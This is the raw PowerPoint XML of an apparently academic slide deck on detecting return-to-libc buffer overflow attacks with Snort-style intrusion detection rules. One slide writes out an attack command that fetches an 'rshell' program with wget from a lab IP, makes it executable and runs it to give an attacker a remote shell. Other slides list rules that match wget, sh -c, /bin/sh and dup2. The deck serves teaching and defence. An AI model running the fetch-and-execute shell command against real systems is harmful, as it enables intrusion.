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2" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="271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C0E11-31CD-4B09-AAFA-8AC17FE566BD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C9E7C-5EF2-4211-BBB7-C7E7FAC7C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7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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> can be any keyword that is particularly of interest like all commands that belong to exec class, /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sh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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or most of the similar commands.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C9E7C-5EF2-4211-BBB7-C7E7FAC7CE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1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CF61CB-F02F-4FCE-A6AD-31CFEEA88217}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/7/2012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70201AB-9F0A-4C12-8774-634EE0FFB592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Obfuscation_(software)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762000"/>
            <a:ext cx="8001000" cy="200558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Detecting Return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t> Buffer Overflow Attacks Using Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Systems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895600"/>
            <a:ext cx="7406640" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presented By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ankush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Jindal(2009CS50234)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jatin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Kumar(2009CS50243)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Buffer Overflow Attack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9" y="1447800"/>
            <a:ext cx="5117592" cy="4800600"/>
          </a:xfrm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‘Buffer overflow’ is famous/infamous hacking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technique in computer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security.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Buffer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overflow conditions are caused by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missed boundary checks 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user-supplied data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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12718"/>
            <a:ext cx="2590800" cy="485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38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Smashing The Stack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785083" cy="48006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Give application a very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long string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malicious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code.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string length,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being much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larger than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space allocated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stack.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return address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now points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the beginning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malicious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code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91" y="1398442"/>
            <a:ext cx="2838450" cy="492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56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Protection Against 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Buffer Overflow Attack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Network Based Intrusion Detection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Prevention Systems.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Host Based Protection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Mechanisms.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Stack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buffer overrun detection.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structured exception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handling.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DEP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ASLR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8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Return-to-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libc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Attack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279392" cy="48006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Divert control flow of exploited program into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libc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code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(),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printf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(),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 code injection required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19200"/>
            <a:ext cx="3886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3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Simulation of attack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6638925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1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Perpetrating the attack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95" y="2362200"/>
            <a:ext cx="2478405" cy="2478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264" y="2362200"/>
            <a:ext cx="2099936" cy="275272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0800000">
            <a:off x="3276600" y="2133600"/>
            <a:ext cx="3810000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1915180"/>
            <a:ext cx="3124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Attack: system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> –c ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> 192.168.10.1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>’); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>;  ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell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2" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2819399"/>
            <a:ext cx="2819400" cy="457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4191000" y="2664023"/>
            <a:ext cx="20574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Requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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3810000" y="3352799"/>
            <a:ext cx="2819400" cy="457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3197423"/>
            <a:ext cx="20574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Receives </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> program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91000" y="3726061"/>
            <a:ext cx="20574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Executes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3657600" y="3879950"/>
            <a:ext cx="533400" cy="23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eft-Right Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3809999" y="4379596"/>
            <a:ext cx="2819401" cy="58102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191000" y="4264223"/>
            <a:ext cx="20574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Attacker has remote shell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0121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Detection of Return-to-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libc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Attack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1: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ndicative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remote connection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brute force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attempt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/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192.168.10.3/32 any -&gt;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any(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:“Stack smashing brute force or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DOA attack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”;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flow :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to_client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, established;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flags:R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 threshold: type both,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track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by_dst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, count 5, seconds 5; priority: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1;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classtype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attempted-user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 sid:1234567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;)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Identify when a “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” is attempted from the server.</a:t>
            </a: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192.168.10.2/32 any -&gt;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any(content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";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:"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request,possible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malicious code download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attempt";priority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1;classtype:attempted-user; sid:5234567;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82296" indent="0">
              <a:buNone/>
            </a:pP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6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62000"/>
            <a:ext cx="7498080" cy="54864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2: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Identify when a “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 is attempted from the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lv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192.168.10.2/32 any -&gt; any any(content: "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";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:"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wget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request,possible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malicious code download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attempt";priority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1;classtype:attempted-user; sid:5234567;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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3: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Identify when  “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–c” is attempted from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lv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any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-&gt; 192.168.10.2/32 any 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flow:to_server,established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 content: "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sh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-c";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"shell command sent from client, possible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remoteattack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";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classtype:attempted-user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 sid:3234567;)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33400"/>
            <a:ext cx="7498080" cy="57150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3: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ooks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repeated concurrent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 byte pattern which contains any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character other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null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byte characters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0x00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any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-&gt;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193.60.151.200/24 80,443,20,25,110,143 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flow:to_server,established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pcre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([^\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x00]{4})\1;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"repeated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words, possible stack overflow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";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classtype:attempted-user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 sid:9234567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 rev:3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;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326214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Testing of Rules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Streamed over 250MB of data over network to the application along with some attack strings.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According to the authors no false positives were detected !!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Really ??</a:t>
            </a:r>
          </a:p>
          <a:p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Rules can be fine tuned by combining multiple of these keywords in one rule.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71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Our Work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Simulating the attack as shown in the paper.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Writing the network application (for victim server)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Corresponding attack client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Detection of the attack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Testing of false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Extending this idea to bypass ASLR security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184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Detecting Return-to-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libc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Buffer Overflow Attacks Using Network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Intrusion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Detection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Systems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David J Day,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Zhengxu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Zhao,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Minhua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2010 Fourth International Conference on Digital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Society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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Obfuscation_(software)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2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hsn\ques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14400"/>
            <a:ext cx="2362200" cy="495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09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044" y="422564"/>
            <a:ext cx="7498080" cy="6019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5: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detect if payload has “dup2”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any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-&gt;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192.168.10.2/32 any(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flow:to_client,established;content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dup2";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"dup2 in string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table, possible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remote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shell attack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";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classtype:attempted-user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 sid:4234567;)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Rule 6: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detect if payload has “/bin/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alert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tcp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any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-&gt; 192.168.10.2/32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any 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flow:to_server,established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 content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:"/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bin/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sh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";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binsh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request,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possibleremote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shell attack";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classtype:attempteduser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; sid:2234567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;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159818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484</TotalTime>
  <Words>650</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>75</Paragraphs>
  <Slides>15</Slides>
  <Notes>1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Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems</vt:lpstr>
      <vt:lpstr>Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Smashing The Stack</vt:lpstr>
      <vt:lpstr>Protection Against  Buffer Overflow Attack</vt:lpstr>
      <vt:lpstr>Return-to-libc Attack </vt:lpstr>
      <vt:lpstr>Simulation of attack</vt:lpstr>
      <vt:lpstr>Perpetrating the attack</vt:lpstr>
      <vt:lpstr>Detection of Return-to-libc Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Testing of Rules</vt:lpstr>
      <vt:lpstr>Our Work</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>IIT Delhi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ankush</dc:creator>
  <cp:lastModifiedBy>ankush</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-11-04T18:51:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-07T04:09:47Z</dcterms:modified>
</cp:coreProperties>
</file>